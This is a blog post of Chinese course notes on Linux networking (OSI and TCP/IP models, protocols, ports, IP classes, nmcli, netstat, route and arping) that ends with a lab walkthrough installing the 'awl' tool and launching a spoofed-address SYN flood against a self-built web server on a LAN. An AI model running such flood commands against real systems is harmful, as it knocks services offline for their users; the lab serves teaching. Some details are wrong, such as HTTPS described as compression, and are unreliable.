评论

收藏

[Linux] Linux 云计算集群架构师->第十八章 Linux 网络管理技术

服务系统 服务系统 发布于:2021-07-26 18:03 | 阅读数:637 | 评论:0

第十八章 Linux 网络管理技术
(上课时间:2021-7-12,笔记整理时间2021-07-23)
本节所讲内容:
18.1 OSI 七层模型和 TCP/IP 四层模型
18.2 linux 网络相关的调试命令
18.3 实战-在局域网中使用 awl 伪装 MAC 地址进行多线程 SYN 洪水***

18.1 OSI 七层模型和 TCP/IP 四层模型
18.1.1 OSI 七层参考模型,TCP/IP 四层参考模型
DSC0000.png

OSI 七层模型:OSI(Open System Interconnection)开放系统互连参考模型是国际标准化组织(ISO)制定的一个用于计算机或通信系统间互联的标准体系。
TCP/IP 四层模型:TCP/IP 参考模型是计算机网络的祖父 ARPANET 和其后继的因特网使用的参考模型。
分层作用:方便管理
DSC0001.png

七层模型优点: [CCNA]
1、把复杂的网络划分成为更容易管理的层(将整个庞大而复杂的问题划分为若干个容易处理的小问题)
2、没有一个厂家能完整的提供整套解决方案和所有的设备,协议.
3、独立完成各自该做的任务,互不影响,分工明确,上层不关心下层具体细节,分层同样有益于网络排错
[tr]分层名字功能工作在该层的设备[/tr]
7应用层提供用户界面IE、迅雷等应用程序
6表示层表示数据,进行加密等处理IE、迅雷等应用程序
5会话层将不同应用程序的数据分离IE、迅雷等应用程序
4传输层提供可靠或不可靠的传输,在重传前执行纠错防火墙
3网络层提供逻辑地址,路由器使用它们来选择路径三层交换机、路由器
2数据链路层将分组拆分为字节,并将字节组合成帧,使用MAC 地址提供介质访问,执行错误检测,但不纠错二层交换机,网卡
1物理层在设备之间传输比特,指定电平,电缆速度和电缆针脚集线器
为什么现代网络通信过程中用 TCP/IP 四层模型,而不是用 OSI 七层模型呢?
OSI 七层模型是理论模型,一般用于理论研究,他的分层有些冗余,实际应用,选择 TCP/IP 的四层模型。而且 OSI 自身也有缺陷,大多数人都认为 OSI 模型的层次数量与内容可能是最佳的选择,其实并非如此,其中会话层和表示层几乎是空的,而数据链路层和网络层包含内容太多,有很多的子层插,每个子层都有不同的功能。
18.1.2 常见网络相关的协议
ARP(Address Resolution Protocol):地址解析协议,将 IP 解析成 MAC 地址地址解析协议,即 ARP(Address Resolution Protocol),是根据 IP 地址获取物理地址的协议。
主机发送信息时将包含目标 IP 地址的 ARP 请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该 IP 地址和物理地址存入本机 ARP 缓存中并保留一定时间,下次请求时直接查询 ARP 缓存以节约资源。地址解析协议是建立在网络中各个主机互相信任的基础上的,网络上的主机可以自主发送 ARP 应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机 ARP 缓存;由此***者就可以向某一主机发送伪 ARP 应答报文,使其发送的信息无法到达预期的主机或到达错误的主机,这就构成了一个 ARP 欺骗(网络执法官软件的工作原理就是 arp 欺骗)。
DNS:域名解析协议 www.baidu.com
SNMP(Simple Network Management Protocol)简单网络管理协议
DHCP(Dynamic Host Configuration Protocol)动态主机配置协议,它是在 TCP/IP 网络上使客户机获得配置信息的协议
FTP(File Transfer Protocol)文件传输协议,它是一个标准协议,是在计算机和网络之间交换文件的最简单的方法。
HTTP(Hypertext Transfer Protocol ):超文本传输协议
HTTPS(Secure Hypertext Transfer Protocol):安全超文本传输协议,它是由 Netscape 开发并内置于其浏览器中,用于对数据进行压缩和解压操作.
ICMP(Internet Control Message Protocol):Internet 控制信息协议,互联网控制报文协议ping ip 定义消息类型有:TTL 超时、地址的请求与应答、信息的请求与应答、目的地不可到达
SMTP(Simple Mail Transfer Protocol):简单邮件传送协议
TELNET Protocol虚拟终端协议
TFTP(Trivial File Transfer Protocol):小文件传输协议
UDP(User Datagram Protocol):用户数据报协议,它是定义用来在互连网络环境中提供包交换的计算机通信的协议
TCP(Transmission Control Protocol): 传输控制协议,是一种面向连接的、可靠的、基于字节流的传输层通信协议 log 转发:开启一个协议:tcp(三次握手和四次挥手)
面试时经常会问道的问题 TCP 和 UPD 的区别:
TCP 协议和 UDP 协议的区别
(1)TCP 协议:TCP(Transmission Control Protocol,传输控制协议)是面向连接的协议,在收发数据前,必须和对方建立可靠的连接。
(2)UDP 协议:UDP 是 User Datagram Protocol 的简称, 中文名是用户数据报协议,是一种无连接的传输层协议,提供面向事务的简单不可靠信息传送服务
总结:TCP 与 UDP 的区别:
1.基于连接与无连接;
2.对系统资源的要求(TCP 较多,UDP 少);
3.UDP 程序结构较简单;UDP 信息包的标题很短,只有 8 个字节,相对于 TCP 的 20 个字节信息包的额外开销很小。所以传输速度可更快
4.TCP 保证数据正确性,UDP 可能丢包;TCP 保证数据顺序,UDP 不保证。
场景: 视频,语音通讯使用 udp,或网络环境很好,比如局域网中通讯可以使用 udp。 udp 数据传输完整性,可以通过应用层的软件算法来校对就可以了。tcp 传文件,数据完整性要求高。
18.1.3 TCP 和 UDP 常用端口号名称
(1)TCP 端口分配
[tr]端口号服务服务描述[/tr]
21ftp文件传输服务
22ssh安全远程连接服务
23telnet远程连接服务
25smtp电子邮件服务
53DNS域名解析服务,有 tcp53 也有用 udp53 端口传输
80httpweb 服务
443https安全 web 服务
[root@CentOS83 ~]# vim /etc/services    #此文件中,包含所有常见端口号及服务名称
/etc/services此文件可以查看常用端口对应的名字。iptables 或 netstat 要把端口解析成协议名时,都需要使用到这个文件。另外后期 xinetd 服务管理一些小服务时,也会使用到此文件来查询对应的小服务端口号。
注:有的服务是 UDP 和 TCP 端口都会监听的。
18.1.4 IP 地址分类
IP 地址分 5 类,常见的地址是 A、B、C 三类
A 类地址:范围从 0-127,0 是保留的并且表示所有 IP 地址,而 127 也是保留的地址,并且是用于测试环回口用的。因此 A 类地址的可用的范围其实是从 1-126 之间。子网掩码:255.0.0.0
A 类地址:A 类地址的网络位由第一组 8 位二进制数表示,主机位由后 3 组 8 位二进制数表示
DSC0002.png

例如:1.0.0.0 这个 A 类 ip 地址
1 是网络位,0.0.0 是主机位,A 类地址是大型网络,含 126 个网段,每个网段主机数大约允许有1670 万台主机,通常分配给拥有大量主机的网络(如主干网)
B 类地址:范围从 128-191,如 172.168.1.1,以子网掩码来进行区别:255.255.0.0
B 类地址:B 类地址的网络位由前 2 组 8 位二进制数表示,主机位由后 2 组 8 位二进制数表示
DSC0003.png

例如:128.255.0.0 这个 B 类 IP 地址
128.255 是网络位,0.0 是主机位,B 类地址是中型网络,含 16384 个网段,每个网段允许有65534 台主机,适用于结点比较多的网络(如区域网)。
C 类地址:范围从 192-223,以子网掩码来进行区别: 255.255.255.0
C 类地址:C 类地址的网络位由前 3 组 8 位二进制数表示,主机位由后 1 组 8 位二进制数表示
DSC0004.png

例如:192.255.255.0 这个 C 类 IP 地址
192.255.255 是网络位,0 是主机位,C 类地址是小型网络,允许有 254 台主机,适用于结点比较少的网络(如校园网)。
D 类地址:范围从 224-239,被用在多点广播(Multicast)中。多点广播地址用来一次寻址一组计算机,它标识共享同一协议的一组计算机。
E 类地址:范围从 240-254,为将来使用保留。
ABC 3 类中私有 IP 地址范围:
A:10.0.0.0--10.255.255.255 子网掩码为 255.0.0.0 或用 /8 表示(网络位 8 位二进制数)
B: 172.16.0.0--172.31.255.255 子网掩码为 255.255.0.0 或用 /16 表示
C: 192.168.0.0--192.168.255.255 子网掩码为 255.255.255.0 或用 /24 表示
这个 127 这个网段都用于环回口,无论是ping 127.0.0.1 还是 ping 127.23.23.23 都可以 ping 通。

18.2 linux 网络相关的调试命令
18.2.1 查看网卡物理连接是否正常
[root@CentOS83 ~]# nmcli device status      #查看网卡物理连接是否正常
DEVICE  TYPE    STATE    CONNECTION
ens33   ethernet  connected  ens33
lo    loopback  unmanaged  --
[root@CentOS83 ~]# ifconfig     #ifconfig 命令被用于配置和显示 Linux 内核中网络接口的网络参数
常见的一些网络接口命名方式
eth0 ..... eth4 ... 以太网接口(linux6)
waln0 无线接口
eno177776 以太网接口 (centos7)
ens33 以太网接口(centos7)
ens160 以太网接口(centos8)
bond0 team0 网卡绑定接口
virbr0 虚拟交换机桥接接口
br0 虚拟网桥接口
lo 本地回环接口
vnet0 KVM 虚拟机网卡接口
18.2.2 修改网卡 IP 地址
方法 1:手工修改网卡配置文件
[root@CentOS83 ~]# vim /etc/sysconfig/network-scripts/ifcfg-ens33 
TYPE=Ethernet
PROXY_METHOD=none
BROWSER_ONLY=no
BOOTPROTO=none    # 参数:static 静态 IP 或 dhcp 或 none 无(不指定)

          #如是none,配上 IP 地址和 static 效果一样
DEFROUTE=yes
IPV4_FAILURE_FATAL=no
IPV6INIT=yes
IPV6_AUTOCONF=yes
IPV6_DEFROUTE=yes
IPV6_FAILURE_FATAL=no
IPV6_ADDR_GEN_MODE=stable-privacy
NAME=ens33                                      #网卡名字
UUID=54fbaabc-47eb-46ac-b35e-90e371c9c304       #UUID 每个网上设备都不一样
DEVICE=ens33                                    #设备名字,在内核中识别的名字
ONBOOT=yes                                      #启用该设备,如果 no,表示不启动此网络设备
IPADDR=10.170.80.83                             #IP 地址
PREFIX=24                                       #子网掩码,24 相当于 255.255.255.0
GATEWAY=10.170.80.1                             #默认网关
DNS1=202.100.96.68                              #首选 DNS 地址
IPV6_PRIVACY=noPEERDNS=no #启用 DHCP 后即会更改/etc/resolv.conf,PEERNDS=no 则不会修改resolv.conf
修改完成使配置生效(在修改配置文件后,需要运行 nmcli con reload 使 NetworkManager 读取配置文件更改。接口依然需要重新启动,以便修改生效):
[root@CentOS83 ~]# nmcli connection show        #显示所有连接
NAME   UUID                  TYPE    DEVICE
ens33  54fbaabc-47eb-46ac-b35e-90e371c9c304  ethernet  ens33
[root@CentOS83 ~]# nmcli connection reload        #重新加载配置
[root@CentOS83 ~]# nmcli connection down ens33      #禁用ens33的配置
[root@CentOS83 ~]# nmcli connection up ens33      #启用ens33的配置
[root@CentOS83 ~]# nmcli device disconnect ens33    #禁用ens33网卡,物理网卡
[root@CentOS83 ~]# nmcli device disconnect ens33    #启用ens33网卡
[root@CentOS83 ~]# systemctl restart network.service  #CentOS 7 重启网络服务
[root@CentOS83 ~]# systemctl restart NetworkManager   #CentOS 8 重启网络服务
[root@CentOS83 ~]# ifdown ens33 && ifup ens33       #关闭网卡ens33成功后再启用网卡ens33
[root@CentOS83 ~]# nmcli con              #使用 nmcli 命令查看网卡 UUID
NAME   UUID                  TYPE    DEVICE
ens33  54fbaabc-47eb-46ac-b35e-90e371c9c304  ethernet  ens33
[root@CentOS83 ~]# nmcli con add con-name ens37 type ethernet ifname ens37  #添加网卡后配置文件使用 nmcli 命令生成
上面命令为接口 ens37 添加一个新连接 ens37,此连接将使用 DHCP 获取 IP 地址并在系统启动后自动连接。配置文件的名称基于 con-name 选项的值 ens37,并保存到/etc/sysconfig/networkscripts/ifcfg-ens37 文件。
[root@CentOS83 ~]# ifconfig ens38 10.170.80.90              #临时配置 IP 地址
[root@CentOS83 ~]# ifconfig ens38 10.170.80.90 netmask 255.255.255.0  #临时配置 IP 地址
[root@CentOS83 ~]# ifconfig ens33:1 10.170.80.93 netmask 255.255.255.0  #给一个网络临时配置多个 IP 地址
临时 ip 没有什么太大用处,临时 ip 因为没有网关,dns 等配置信息,无法访问外网,只有内网可以互相 ping 通,要想访问外网还需要添加网关等信息,如 route add default gateway 192.168.1.1,这样做不如直接写入配置文件更方便。
centos7 使用 systemctl restart NetworkManager 命令使用临时 ip,使用 systemctl restart network 或 ifdown ens33 && ifup ens33 都会恢复真实 IP。
18.2.3 查看端口的监听状态
netstat 命令: 查看系统中网络连接状态信息,
常用的参数格式 : netstat -anutp
-a, --all 显示本机所有连接和监听的端口
-n, --numeric don't resolve names 以数字形式显示当前建立的有效连接和端口
-u 显示 udp 协议连接
-t 显示 tcp 协议连接
-p, --programs 显示连接对应的 PID 与程序名
DSC0005.png

Proto===连接协议的种类
Recv-Q====接收到字节数
Send-Q====从本服务器,发出去的字节数
Local Address====本地的 IP 地址,可以是 IP,也可以是主机名
Foreign Address====远程主机的 IP 地址
网络连接状态 STATE:
CLOSED : 初始(无连接)状态。
LISTEN : 侦听状态,等待远程机器的连接请求。
ESTABLISHED: 完成 TCP 三次握手后,主动连接端进入 ESTABLISHED 状态。此时,TCP 连接已经建立,可以进行通信。
TIME_WAIT : 在 TCP 四次挥手时,主动关闭端发送了 ACK 包之后,进入 TIME_WAIT 状态,等待最多 MSL 时间,让被动关闭端收到 ACK 包Y
DSC0006.png

MSL,即 Maximum Segment Lifetime,一个数据分片(报文)在网络中能够生存的最长时间,在 RFC 793 中定义 MSL 通常为 2 分钟,即超过两分钟即认为这个报文已经在网络中被丢弃了。对于一个 TCP 连接,在双方进入 TIME_WAIT 后,通常会等待 2 倍 MSL 时间后,再关闭掉连接,作用是为了防止由于 FIN(最后一个挥手包)报文丢包,对端重发导致与后续的 TCP 连接请求产生顺序混乱。
TCP四次挥手断开连接
连接终止协议(四次挥手):
由于TCP连接是全双工的,因此每个方向都必须单独进行关闭。这原则是当一方完成它的数据发送任务后就能发送一个FIN来终止这个方向的连接。收到一个 FIN只意味着这一方向上没有数据流动,一个TCP连接在收到一个FIN后仍能发送数据。首先进行关闭的一方将执行主动关闭,而另一方执行被动关闭。
  • TCP客户端发送一个FIN,用来关闭客户到服务器的数据传送。
  • 服务器收到这个FIN,发回一个ACK,确认序号为收到的序号加1。和SYN一样,一个FIN将占用一个序号。
  • 服务器关闭客户端的连接,发送一个FIN给客户端。
  • 客户端发回ACK报文确认,并将确认序号设置为收到序号加1。
DSC0007.png

服务器上有大量 TIME_WAIT 连接,如何优化 TCP 连接,快速释放 tcp 连接。
[root@CentOS83 ~]#  netstat -antup | grep TIME_WAIT       
[root@CentOS83 ~]# cat /proc/sys/net/ipv4/tcp_fin_timeout 60    #linux 下默认 MSL 等待时间是 60 秒
[root@CentOS83 ~]# echo 30 > /proc/sys/net/ipv4/tcp_fin_timeout   #通过缩短时间time_wait 时间来快速释放链接
Linux 内核调优,就是由这样一个一个参数累积起来的。
修改主机名配置文件,作用:设置主机名永久生效
[root@CentOS83 ~]# vim /etc/hostname            #编辑hostname配置文件
[root@CentOS83 ~]# # hostnamectl set-hostname Centos88    #命令修改主机名
配置 IP 与主机名(域名)的对应关系
[root@CentOS83 ~]# vim /etc/hosts               #优先级高于 DNS 解析
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4
::1     localhost localhost.localdomain localhost6 localhost6.localdomain6
10.170.80.83  mygod83.cn
10.170.80.84  mygod84.cn
10.170.80.85  mygod85.cn
18.2.4 配置 DNS-路由相关信息
DNS 配置的配置文件
[root@CentOS83 ~]# cat /etc/resolv.conf           #DNS 配置的配置文件Generated by NetworkManager
nameserver 202.100.96.68
在 centos5/6 版本,配置 DNS 用这个文件。在 centos6 以后,直接在网卡配置文件中指定:
DNS1=192.168.1.1
默认情况下,域名解析顺序: 本地 hosts 文件 -->> DNS 查询
[root@CentOS83 ~]# vim /etc/nsswitch.conf           #查找以下内容 hostsIn order of likelihood of use to accelerate lookup.
shadow:   files sss
hosts:    files dns myhostname
DSC0008.png

[root@CentOS83 ~]# route -n                 #查看路由信息
Kernel IP routing table
Destination   Gateway     Genmask     Flags Metric Ref  Use Iface
0.0.0.0     10.170.80.1   0.0.0.0     UG  100  0    0 ens33
10.170.80.0   0.0.0.0     255.255.255.0   U   100  0    0 ens33
注:0.0.0.0           192.168.1.1             0.0.0.0     #前面 0.0.0.0 表示匹配任何网段,后面 0.0.0.0表示匹配所有主机,这行就是默认网关
参数: -n :不要使用通讯协定或主机名称,直接使用 IP 或 port number;
route 命令输出的路由表字段含义如下:
Destination 目标 :The destination network or destination host. 目标网络或目标主机。
Gateway 网关 :网关地址,如果是本地网段 IP,就显示 0.0.0.0
Genmask :子网掩码
添加/删除路由条目:
[root@CentOS83 ~]# route add [-net|-host] [网域或主机] netmask [mask] [gw|dev]
[root@CentOS83 ~]# route del [-net|-host] [网域或主机] netmask [mask] [gw|dev]
增加 (add) 与删除 (del) 路由的相关参数:
-net :表示后面接的路由为一个网域;
-host :表示后面接的为连接到单部主机的路由;
netmask :与网域有关,可以设定 netmask 决定网域的大小;
gw :gateway 的简写,后续接的是 IP 的数值喔,与 dev 不同;
dev :如果只是要指定由那一块网路卡连线出去,则使用这个设定,后面接 eth0 等
添加/删除路由条目:
添加路由(把 Linux 做成路由器时或服务器有多个网卡,指定到不同网段走哪个网卡)
实战场景:多个网卡,多个网段,实现不同数据走不同网卡。如果网络管理和生产数据分开管理。
比如生产数据走 1.0 网段,网络管理走 2.0 网段,网络管理数据不走生产或对外提供服务的网段,这样也不会乱(前提你得有多个网卡)
[root@CentOS83 ~]# route add -net 192.168.2.0 netmask 255.255.255.0 dev ens33
[root@CentOS83 ~]# route -n
Kernel IP routing table
Destination   Gateway     Genmask     Flags Metric Ref  Use Iface
0.0.0.0     10.170.80.1   0.0.0.0     UG  100  0    0 ens33
10.170.80.0   0.0.0.0     255.255.255.0   U   100  0    0 ens33
192.168.2.0   0.0.0.0     255.255.255.0   U   0    0    0 ens33
[root@CentOS83 ~]# route del -net 192.168.2.0 netmask 255.255.255.0
路由跟踪
[root@CentOS83 ~]# yum -y install traceroute
[root@CentOS83 ~]# tracerouter qq.com       #路由跟踪:查看经过多少个路由器到目标网址
ping 命令的一般格式为:
-c 数目 在发送指定数目的包后停止。
-i 秒数 设定间隔几秒送一个网络封包给一台机器,默认值是 1 秒送 1 次
-w 等待指定时间后停止 ping 程序的执行,时间单位是秒。
Linux下如何检查 IP 地址冲突后或有网关冲突
[root@CentOS83 ~]#  arping -I ens33 10.170.80.1   
ARPING 10.170.80.1 from 10.170.80.83 ens33
Unicast reply from 10.170.80.1 [E4:26:8B:D1:21:3A]  9.522ms
Unicast reply from 10.170.80.1 [E4:26:8B:D1:21:3A]  10.872ms
Unicast reply from 10.170.80.1 [E4:26:8B:D1:21:3A]  4.979ms
ping 向一个网关,mac 地址都是一样的,说明正常,但是 mac 地址不一样。
同一个 ip 地址解析出 2 个 mac 地址,那么就有人冒充网关了。
网络执法官利用 ARP 欺骗原理使被***的电脑无法上网,使该电脑无法找到网关的 MAC 地址
watch
作用:实时监测命令的运行结果,可以看到所有变化数据包的大小
-d 高亮显示变化的区域(指令信息不同之处)
-n 指定指令执行的间隔时间(秒)
[root@CentOS83 ~]#  watch -d -n 1 'ifconfig ens33'    #每隔 1 秒高亮显示 ens33 网卡相关信息
DSC0009.png


18.3 实战-在局域网中使用 awl 伪装 MAC 地址进行多线程
SYN 洪水***
http://ssa.yundun.com/cc 云盾全球实时***图
18.3.1 tcp 三次握手及 tcp 连接状态
TCP 报文段的首部格式:
DSC00010.png

需要了解的信息:
ACK : TCP 协议规定,只有 ACK=1 时有效,也规定连接建立后所有发送的报文的 ACK 必须为 1
SYN(SYNchronization) : 在连接建立时用来同步序号。当 SYN=1 而 ACK=0 时,表明这是一个连接请求报文。对方若同意建立连接,则应在响应报文中使 SYN=1 和 ACK=1. 因此, SYN 置 1 就表示这是一个连接请求或连接接受报文。
synchronization [ˌsɪŋkrənaɪ'zeɪʃn] 同步
FIN (finis)即完,终结的意思, 用来释放一个连接。当 FIN = 1 时,表明此报文段的发送方的数据已经发送完毕,并要求释放连接。
finis ['faɪnɪs] 终结
建立 tcp 连接时的 tcp 三次握手和断开 tcp 连接时的 4 次挥手整体过程说明图:
DSC00011.png

**使用 tcpdump 抓包查看 tcp 三次握手过程
tcp 三次握手过程:
Client:我可以给你发数据吗?
Server:可以
Client:好的
DSC00012.png

三次握手的核心是: 确认每一次包的序列号。
tcp 三次握手过程:
1、首先由 Client 发出请求连接即 SYN=1,声明自己的序号是 seq=x
2、然后 Server 进行回复确认,即 SYN=1 ,声明自己的序号是 seq=y, 并设置为 ack=x+1,
3、最后 Client 再进行一次确认,设置 ack=y+1.
TCP 连接状态详解:
服务器端:LISTEN:侦听来自远方的 TCP 端口的连接请求
客户端:SYN-SENT:在发送连接请求后等待匹配的连接请求
服务器端:SYN-RECEIVED:在收到和发送一个连接请求后等待对方对连接请求的确认
客户端/服务器端:ESTABLISHED:代表一个打开的连接
18.3.2 实战:在局域网中使用 awl 伪装 IP 地址进行多线程 SYN 洪水***
SYN 洪水*概述:SYN 洪水*主要源于: tcp 协议的三次握手机制
10.170.80.63 (AWL机器)伪装IP地址和MAC地址,对10.170.80.83(web服务器)发送大量SYN包
SYN 洪水***的过程:
在服务端返回一个确认的 SYN-ACK 包的时候有个潜在的弊端,如果发起的客户是一个不存在的客户端,那么服务端就不会接到客户端回应的 ACK 包。
这时服务端需要耗费一定的数量的系统内存来等待这个未决的连接,直到等待超时关闭,才能施放内存。
如果恶意者通过通过 ip 欺骗,发送大量 SYN 包给受害者系统,导致服务端存在大量未决的连接并占用大量内存和 tcp 连接,从而导致正常客户端无法访问服务端,这就是 SYN 洪水***的过程。
下载地址:https://gitlab.com/davical-project/awl/tags
在10.170.80.63 安装 awl 软件进行***:
开始安装 awl(需要使用 centos7.6 版本系统)
[root@CentOS83 ~]# tar xvf awl-0.2.tar.gz       #解压
[root@CentOS83 ~]# cd awl-0.2
[root@CentOS83 awl-r0.62]# ./configure        # 查检软件包安装环境
[root@CentOS83 awl-r0.62]# make -j 4        #make 把源代码编译成可执行的二进制文件 -j 4 以 4 个进程同时编译,速度更快
[root@CentOS83 awl-r0.62]# make install       #安装
[root@CentOS83 awl-r0.62]# which awl        #查看安装的命令
/usr/local/bin/awl
在10.170.80.83上搭建一台 web 服务器,模拟要被***的服务器
[root@CentOS83 ~]# yum install httpd -y       #安装 web 服务器
[root@CentOS83 ~]# systemctl start httpd      #启动httpd 服务
[root@CentOS83 ~]# curl 10.170.80.83        #测试 10.170.80.83 服务器
[root@CentOS83 ~]# iptables -F            #清空iptables 防火墙
开始*: 在局域网中使用 awl 伪装 IP 地址进行多线程 SYN *,获取对方的 IP 地址解析成 MAC 地址
[root@CentOS83 ~]# ping 10.170.80.83
[root@CentOS83 ~]# arp -n
Address          HWtype  HWaddress       Flags Mask      Iface
10.170.80.83       ether   00:0c:29:2f:04:8d   C           ens33
10.170.80.1        ether   e4:26:8b:d1:21:3a   C           ens33
10.170.80.180      ether   5c:e0:c5:50:bb:7b   C           ens33
10.170.80.100      ether   88:2d:53:5c:99:d5   C           ens33
开始***:
awl 参数如下:
-i 发送包的网卡接口,如果省略默认是 eth0
-m 指定目标 mac 地址 注:如果-m 没有指定 mac,默认目标 MAC 地址是“FF.FF.FF.FF.FF.FF”,
这表示向同一网段内的所有主机发出 ARP 广播,进行 SYN ***,还容易使整个局域网瘫痪。
-d 被***机器的 IP
-p 被***机器的端口
[root@CentOS83 ~]# iptables -F
[root@CentOS83 ~]# awl -i ens33 -m 00:0c:29:2f:04:8d -d 10.170.80.83 ip -p 80
5 秒钟 ctlr +c 停止
测试***效果:
DSC00013.png

在10.170.80.64 上查看:发现很多伪装成公网的 IP 在***我们
[root@CentOS83 ~]# netstat -anput | grep 80
DSC00014.png

总结:
18.1 OSI 七层模型和 TCP/IP 四层模型
18.2 linux 网络相关的调试命令
18.3 实战:在局域网中使用 awl 伪装 MAC 地址进行多线程 SYN 洪水***

关注下面的标签,发现更多相似文章